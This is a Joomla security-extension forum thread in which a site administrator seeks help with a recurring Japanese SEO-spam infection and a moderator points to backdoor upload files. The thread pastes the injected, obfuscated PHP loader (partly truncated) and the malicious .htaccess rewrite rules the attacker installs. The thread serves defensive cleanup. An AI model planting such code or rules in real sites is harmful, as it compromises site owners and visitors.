- Home
- /
- Forum
- /
- Securitycheck Pro
- /
- Wishlists
- /
- Download suspicious files
Site keeps getting infected even with SecurityCheck Pro
- shibumi
-
Topic Author
- Offline
- Senior Member
-
Less
More
4 years 4 months ago #4461
by shibumi
Site keeps getting infected even with SecurityCheck Pro was created by shibumi
I have a site I manage that I took over because it was hacked. I cleaned up to my knowledge all of the malicious code, even moved the site to a different server. The original "malware" infection is gone, but now, the root index.php keeps getting injected with code that loads a japanese content webpage. The index.php file I have made read only (0444) and yet it is still getting injected with the malicious code and file permissions are changed to 0644. I clean it, chmod it back to 0444 and a day or two later it is back again, and file permissions back to 0644. How do I finally get rid of this little bugger?
Please Log in or Create an account to join the conversation.
- Jose
-
- Offline
- Moderator
-
Less
More
- Posts: 4314
- Thank you received: 323
4 years 4 months ago #4462
by Jose
Replied by Jose on topic Site keeps getting infected even with SecurityCheck Pro
Hi Jeff,
Last week I cleaned an infection like yours; the site was infected again and again because there were many backdoors into it. If cybercrooks put a backdoor in the site they will be able to bypass the firewall; we must not forget that SCP is a Web Application Firewall (accesses to backdoors are done directly and not following the Joomla route mechanism, so there is no attack).
A few questions?
- Is the malware scanner configured to scan the entire filesystem (timeline = 10000 and deep scan enabled)?
- Is the file itegrity feature alerting you of the modified file?
Regards,
Jose
Last week I cleaned an infection like yours; the site was infected again and again because there were many backdoors into it. If cybercrooks put a backdoor in the site they will be able to bypass the firewall; we must not forget that SCP is a Web Application Firewall (accesses to backdoors are done directly and not following the Joomla route mechanism, so there is no attack).
A few questions?
- Is the malware scanner configured to scan the entire filesystem (timeline = 10000 and deep scan enabled)?
- Is the file itegrity feature alerting you of the modified file?
Regards,
Jose
Please Log in or Create an account to join the conversation.
- shibumi
-
Topic Author
- Offline
- Senior Member
-
4 years 4 months ago #4480
by shibumi
Replied by shibumi on topic Site keeps getting infected even with SecurityCheck Pro
Hi Jose,
I tried your suggestions and ran a deep scan last night, and it did find Blackhat SEO Spam, I cleaned up the files, and once again this evening this code was injected at the top of the root index.php file:
Every time it is injected, there is no Last Modified time stamp change to the file, except for when I remove the above code, and save the file, and then chmod it to 0444. the only thing that is different that indicates the file has been injected again, is the file permissions have changed back to 0644.
This site, when they originally contacted me for help, was infected with over 5000 malicious html files in various added to their server which had been all removed. I would do a complete re-install of their site from scratch, but not sure if the client has copies of all their paid extensions/templates as I did not do the original design, and not sure of the original designer is still around since they contacted me for help.
I attached the export of the latest deep scan
Thanks,
Jeff
I tried your suggestions and ran a deep scan last night, and it did find Blackhat SEO Spam, I cleaned up the files, and once again this evening this code was injected at the top of the root index.php file:
@set_time_limit(0);
$xmlname = 'mapss.xml';
$jdir = '';
$smuri_tmp = smrequest_uri();
if($smuri_tmp==''){
$smuri_tmp='/';
}
$smuri = base64_encode($smuri_tmp);
$dt = 0;
function smrequest_uri(){
if (isset($_SERVER['REQUEST_URI'])){
$smuri = $_SERVER['REQUEST_URI'];
}else{
if(isset($_SERVER['argv'])){
$smuri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['argv'][0];
}else{
$smuri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['QUERY_STRING'];
}
}
return $smuri;
}
$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO
.... more lines of code ....
MDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw=="));Every time it is injected, there is no Last Modified time stamp change to the file, except for when I remove the above code, and save the file, and then chmod it to 0444. the only thing that is different that indicates the file has been injected again, is the file permissions have changed back to 0644.
This site, when they originally contacted me for help, was infected with over 5000 malicious html files in various added to their server which had been all removed. I would do a complete re-install of their site from scratch, but not sure if the client has copies of all their paid extensions/templates as I did not do the original design, and not sure of the original designer is still around since they contacted me for help.
I attached the export of the latest deep scan
Thanks,
Jeff
Please Log in or Create an account to join the conversation.
- Jose
-
- Offline
- Moderator
-
Less
More
- Posts: 4314
- Thank you received: 323
4 years 4 months ago #4481
by Jose
Replied by Jose on topic Site keeps getting infected even with SecurityCheck Pro
Hi Jeff,
This is really odd; even a single character modified changes the hash value and you should be alerted...
I have checked the zipped file attached and I think still there are some malicious files (I should get the files to be fully sure); check the file /libraries/joomla/application/cache-66e.php and /media/system/images/thumb.php. I think those files are upload forms, so hacker can use them to upload new backdoors.
Also remember I clean infected websites; if you need help ask me for a quotation. Maybe you can clean the website instead a complete re-install.
Regards,
Jose
Every time it is injected, there is no Last Modified time stamp change to the file, except for when I remove the above code, and save the file, and then chmod it to 0444. the only thing that is different that indicates the file has been injected again, is the file permissions have changed back to 0644.
This is really odd; even a single character modified changes the hash value and you should be alerted...
I have checked the zipped file attached and I think still there are some malicious files (I should get the files to be fully sure); check the file /libraries/joomla/application/cache-66e.php and /media/system/images/thumb.php. I think those files are upload forms, so hacker can use them to upload new backdoors.
Also remember I clean infected websites; if you need help ask me for a quotation. Maybe you can clean the website instead a complete re-install.
Regards,
Jose
Please Log in or Create an account to join the conversation.
- shibumi
-
Topic Author
- Offline
- Senior Member
-
4 years 4 months ago #4501
by shibumi
Replied by shibumi on topic Site keeps getting infected even with SecurityCheck Pro
I tried to post the other day, but kept giving me an error, then could not even access your site for a while...
The only time the timestamp changes is when I remove the code and save the file.
My last file integrity scan showed 3 modified files: .htaccess (2017-05-07 03:23:15), error_log (2017-05-07 08:24:50) and index.php (2017-05-07 08:21:18)
Another interesting thing, is my .htaccess file is getting wiped and overwritten with the following code at 5:23am everyday:or this code:
I deleted the two files you mentioned, they were definitely malicious coded files, and the Japanese content injection seemed to be gone, until today, it came back...
Hi Jeff,
Every time it is injected, there is no Last Modified time stamp change to the file, except for when I remove the above code, and save the file, and then chmod it to 0444. the only thing that is different that indicates the file has been injected again, is the file permissions have changed back to 0644.
This is really odd; even a single character modified changes the hash value and you should be alerted...
The only time the timestamp changes is when I remove the code and save the file.
My last file integrity scan showed 3 modified files: .htaccess (2017-05-07 03:23:15), error_log (2017-05-07 08:24:50) and index.php (2017-05-07 08:21:18)
Another interesting thing, is my .htaccess file is getting wiped and overwritten with the following code at 5:23am everyday:
RewriteEngine On
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^[a-zA-Z0-9]{3}([a-zA-Z0-9]{5,19})/([0-9]{1,7}).html$ index.php?tempweb=$1&smid=$2 [L]
RewriteBase /
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule . /index.php [L]RewriteEngine On
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^[a-zA-Z0-9]{3}([a-zA-Z0-9]{5,19})/([0-9]{1,7}).html$ index.php?tempweb=$1&smid=$2 [L]
RewriteBase /
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^([0-9]+)\/([^\d\/]+)\/([0-9]+)_(.*)..*$ ?$2$3=$1&%{QUERY_STRING}[L]
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).[0-9]+,[0-9]+.[0-9]+,[0-9]+.*\/.*=![0-9]+.*[0-9]+![0-9]+.*[0-9]+![0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*\:[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).[0-9]+,[0-9]+.[0-9]+,[0-9]+.*\/.*=![0-9]+.*[0-9]+![0-9]+.*[0-9]+![0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*\:[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*\?.*=.*-JP$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^(.*)\/([^\d\/]+)\/([0-9]+)\/([0-9]+)\/.*\/.*\/.*\/.*..*$ ?$2$3=$4&%{QUERY_STRING}[L]
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule . /index.php [L]I have checked the zipped file attached and I think still there are some malicious files (I should get the files to be fully sure); check the file /libraries/joomla/application/cache-66e.php and /media/system/images/thumb.php. I think those files are upload forms, so hacker can use them to upload new backdoors.
I deleted the two files you mentioned, they were definitely malicious coded files, and the Japanese content injection seemed to be gone, until today, it came back...
Also remember I clean infected websites; if you need help ask me for a quotation. Maybe you can clean the website instead a complete re-install.
Regards,
Jose
Please Log in or Create an account to join the conversation.
- Jose
-
- Offline
- Moderator
-
Less
More
- Posts: 4314
- Thank you received: 323
4 years 4 months ago #4502
by Jose
Replied by Jose on topic Site keeps getting infected even with SecurityCheck Pro
Hi Jeff,
Regards,
Jose
Yes, I did some improvements in the site. I apologize about that.I tried to post the other day, but kept giving me an error, then could not even access your site for a while...
Maybe hackers change the timestamp, but even if this happens the hash value should change and the extension should warn you.The only time the timestamp changes is when I remove the code and save the file.
My last file integrity scan showed 3 modified files: .htaccess (2017-05-07 03:23:15), error_log (2017-05-07 08:24:50) and index.php (2017-05-07 08:21:18)
I think this is an automated task of your hosting provider; please, read this forum entryAnother interesting thing, is my .htaccess file is getting wiped and overwritten with the following code at 5:23am everyday
Or your website or the server is still infected; do you have a shared hosting or a dedicated server?I deleted the two files you mentioned, they were definitely malicious coded files, and the Japanese content injection seemed to be gone, until today, it came back...
Regards,
Jose
Please Log in or Create an account to join the conversation.
Time to create page: 0.079 seconds